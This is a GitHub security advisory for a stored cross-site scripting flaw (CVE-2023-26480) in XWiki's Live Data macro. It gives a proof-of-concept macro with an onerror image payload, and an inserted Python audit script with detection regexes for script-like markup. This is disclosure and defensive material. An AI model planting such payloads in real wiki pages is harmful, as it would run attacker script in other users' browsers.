XWiki-Platform vulnerable to stored Cross-site Scripting via the HTML displayer in Live Data

High severity GitHub Reviewed Published Mar 1, 2023 in xwiki/xwiki-platform • Updated Mar 3, 2023

Package

org.xwiki.platform:xwiki-platform-livedata-macro (Maven)

Affected versions

>= 12.10, < 13.10.10

>= 14.0, < 14.4.7

>= 14.5, < 14.9

Patched versions

13.10.10

14.4.7

14.9

Impact

A user without script rights can introduce a stored XSS by using the Live Data macro.

For instance:

{{liveData id="movies" properties="title,description"}}
{
  "data": {
    "count": 1,
    "entries": [
      {
        "title": "Meet John Doe",
        "url": "https://www.imdb.com/title/tt0033891/",
        "description": "<img onerror='alert(1)' src='foo' />"
      }
    ]
  },
  "meta": {
    "propertyDescriptors": [
      {
        "id": "title",
        "name": "Title",
        "visible": true,
        "displayer": {"id": "link", "propertyHref": "url"}
      },
      {
        "id": "description",
        "name": "Description",
        "visible": true,
        "displayer": "html"
      }
    ]
  }
}
{{/liveData}}
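As an added defender's example (not XWiki's own code), the following Python audit script scans wiki source for Live Data macros whose inline JSON entries are rendered by the "html" displayer and contain script-like markup, so administrators can locate affected content before upgrading. The macro syntax and JSON shape follow the advisory above; the regex heuristics, function names and the embedded sample page are this example's own assumptions.

```python
import json
import re

# Added example (not XWiki's own code): audit wiki source for Live Data macros
# that route user-supplied values through the "html" displayer, which the
# advisory above describes as the stored-XSS vector on unpatched versions.
LIVEDATA_RE = re.compile(r"\{\{liveData\b[^}]*\}\}(.*?)\{\{/liveData\}\}", re.DOTALL)
# Heuristic for active content in a rendered value (assumption of this example).
ACTIVE_HTML_RE = re.compile(r"<\s*script\b|\bon[a-z]+\s*=|javascript\s*:", re.IGNORECASE)

# Constructed sample page containing the macro from the advisory above.
SAMPLE_PAGE = '''Some wiki text.
{{liveData id="movies" properties="title,description"}}
{"data": {"count": 1, "entries": [{"title": "Meet John Doe",
  "url": "https://www.imdb.com/title/tt0033891/",
  "description": "<img onerror='alert(1)' src='foo' />"}]},
 "meta": {"propertyDescriptors": [
  {"id": "title", "name": "Title", "visible": true,
   "displayer": {"id": "link", "propertyHref": "url"}},
  {"id": "description", "name": "Description", "visible": true,
   "displayer": "html"}]}}
{{/liveData}}
'''


def html_displayer_properties(meta):
    """Return ids of properties rendered by the HTML displayer.
    A displayer may be a bare string ("html") or an object ({"id": "html", ...})."""
    ids = []
    for descriptor in meta.get("propertyDescriptors", []):
        displayer = descriptor.get("displayer")
        if isinstance(displayer, dict):
            displayer = displayer.get("id")
        if displayer == "html":
            ids.append(descriptor["id"])
    return ids


def find_risky_livedata(wiki_source):
    """Return (macro_index, property_id, value) for every entry value that the
    HTML displayer would render and that contains script-like markup."""
    findings = []
    for index, match in enumerate(LIVEDATA_RE.finditer(wiki_source)):
        try:
            payload = json.loads(match.group(1))
        except json.JSONDecodeError:
            continue  # body is not inline JSON (other source types); skip
        html_props = html_displayer_properties(payload.get("meta", {}))
        for entry in payload.get("data", {}).get("entries", []):
            for prop in html_props:
                value = entry.get(prop)
                if isinstance(value, str) and ACTIVE_HTML_RE.search(value):
                    findings.append((index, prop, value))
    return findings
```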

Patches

This has been patched in XWiki 14.9, 14.4.7, and 13.10.10.

Workarounds

No known workaround.

References

https://jira.xwiki.org/browse/XWIKI-20143

For more information

If you have any questions or comments about this advisory:

  • Open an issue in Jira
  • Email us at Security ML

References

  • GHSA-32fq-m2q5-h83g
  • https://nvd.nist.gov/vuln/detail/CVE-2023-26480
  • xwiki/xwiki-platform@23d5ea9
  • xwiki/xwiki-platform@556e782
  • https://jira.xwiki.org/browse/XWIKI-20143

Published by the National Vulnerability Database

Mar 2, 2023

Published to the GitHub Advisory Database

Mar 3, 2023

Related news

CVE-2023-26480: Stored XSS via the HTML displayer in Live Data

XWiki Platform is a generic wiki platform. Starting in version 12.10, a user without script rights can introduce a stored cross-site scripting by using the Live Data macro. This has been patched in XWiki 14.9, 14.4.7, and 13.10.10. There are no known workarounds.